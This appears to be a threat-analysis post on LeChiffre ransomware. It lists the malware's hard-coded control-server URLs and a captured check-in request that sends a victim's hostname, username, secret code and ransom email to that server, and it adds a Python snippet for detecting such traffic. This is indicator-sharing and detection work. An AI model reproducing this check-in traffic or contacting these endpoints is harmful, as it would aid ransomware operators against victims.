I'm seeing a bunch of hard-coded control server paths:
hxtp://184.107.251.146/sipvoice.php?changecomment=&comment=
hxtp://184.107.251.146/sipvoice.php?insert=&servername=
hxtp://184.107.251.146/sipvoice.php?shutdown=&reason=
hxtp://184.107.251.146/sipvoice.php?update=&finished=
hxtp://184.107.251.146/sipvoice.php?updqua=&quantity=
Network:
GET /sipvoice.php?insert=&servername=Sandbox&username=Administrator&started=25.01.16 10:41&secretcode=b8rEq0zv69Tov31yu40fzcmkPS0/Jy7RJYnM1SQoPJzJKTJyGu9eDBckvcS3baP2qRd0BDAy0k/vGuwhsl34GFSg2o/q1dWzQcmHBCYBUWKR4A5zBBtJti1VQDxJbBn9c46H/xgSHevRay8Z3imFp7rZdRbqDDrWNvH7UvX/fijK2HEpHD2cMlyjWZN5uCXphfiUm+UF5CCfwYF7g6Ll2zDc3snOYGy6VTacIzJVC+4BM5zCeTQKlbRmj9jXlnom&email=decrypt.my.files@gmail.com&session=rihsdhieLENrlXaRYaqojfDpyTKFpnFE&patched=0 HTTP/1.0
Host: 184.107.251.146
Keep-Alive: 300
Connection: keep-alive
User-Agent: Mozilla/4.0 (compatible; Synapse)
/sipvoice.php?
insert=
servername=Sandbox
username=Administrator
started=25.01.16 10:41
secretcode=b8rEq0zv69Tov31yu40fzcmkPS0/Jy7RJYnM1SQoPJzJKTJyGu9eDBckvcS3baP2qRd0BDAy0k/vGuwhsl34GFSg2o/q1dWzQcmHBCYBUWKR4A5zBBtJti1VQDxJbBn9c46H/xgSHevRay8Z3imFp7rZdRbqDDrWNvH7UvX/fijK2HEpHD2cMlyjWZN5uCXphfiUm+UF5CCfwYF7g6Ll2zDc3snOYGy6VTacIzJVC+4BM5zCeTQKlbRmj9jXlnom
email=decrypt.my.files@gmail.com
session=rihsdhieLENrlXaRYaqojfDpyTKFpnFE
patched=0
--------------------------
Also looks like the following was pwned:
ftp://200.27.90.24/_help%20to%20decrypt%20LeChiffre%20for%20[RESPALDO]%20l.html
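
A defender-side check for the check-in request quoted above, as an added example that is not part of the original post: it parses a raw request (including the unencoded space in `started=`) and reports which traits of the pattern match. The function names, trait labels and both sample requests are constructed for illustration.

```python
# Added example: flag HTTP requests shaped like the check-in shown in the post.
COMMANDS = {"changecomment", "insert", "shutdown", "update", "updqua"}  # from the post's URL list
SCRIPT = "/sipvoice.php"

def parse_request(raw):
    """Return (method, path, params, headers) from a raw HTTP request string."""
    head, *header_lines = raw.strip().splitlines()
    method, rest = head.split(" ", 1)
    # The target contains a raw space ("started=25.01.16 10:41"), so take the
    # HTTP version from the right instead of splitting on every space.
    target, _version = rest.rsplit(" ", 1)
    path, _, query = target.partition("?")
    params = {}
    for pair in query.split("&"):
        key, _, value = pair.partition("=")
        params[key] = value  # no URL-decoding: '+' and '/' in secretcode stay intact
    headers = {}
    for line in header_lines:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return method, path, params, headers

def score_request(raw):
    """Return the list of matched traits; an empty list means no match."""
    _method, path, params, headers = parse_request(raw)
    hits = []
    if path.endswith(SCRIPT):
        hits.append("script")
    cmds = sorted(COMMANDS & params.keys())
    if cmds:
        hits.append("command:" + ",".join(cmds))
    if {"secretcode", "session", "patched"} <= params.keys():
        hits.append("checkin-fields")
    if "synapse" in headers.get("user-agent", "").lower():
        hits.append("ua-synapse")
    return hits

# Constructed samples: the first is modelled on the request in the post with
# placeholder values, the second is an unrelated request.
SAMPLE = (
    "GET /sipvoice.php?insert=&servername=HOST1&username=user&started=25.01.16 10:41"
    "&secretcode=AAA+BBB/CCC&email=placeholder@example.invalid&session=XYZ&patched=0 HTTP/1.0\n"
    "Host: 192.0.2.10\n"
    "User-Agent: Mozilla/4.0 (compatible; Synapse)\n"
)
BENIGN = "GET /index.php?page=1 HTTP/1.1\nHost: 192.0.2.20\nUser-Agent: curl/8.0\n"

if __name__ == "__main__":
    print(score_request(SAMPLE))
    print(score_request(BENIGN))
```

The `ua-synapse` trait on its own is weak, since that User-Agent is the default of the Synapse networking library and also appears in legitimate software; it is most useful combined with the script path and field set.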